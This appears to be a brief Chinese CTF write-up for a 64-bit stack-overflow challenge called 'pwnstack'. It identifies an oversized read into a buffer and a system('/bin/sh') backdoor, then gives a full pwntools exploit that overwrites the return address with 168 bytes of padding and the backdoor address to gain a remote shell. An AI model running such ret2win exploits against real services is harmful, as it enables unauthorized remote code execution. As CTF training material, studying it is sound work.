pwnstack
发现是64位文件
发现vuln双击进入
看到read知道这里是要将B1(177)的数据输入buf,这里涉及了栈溢出
发现system和binsh
后门
A8十进制是168
exp:
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','52779')
padding = b'a'*(0xa8)
door = 0x400762
payload = padding + p64(door)
io.sendline(payload)
io.interactive()
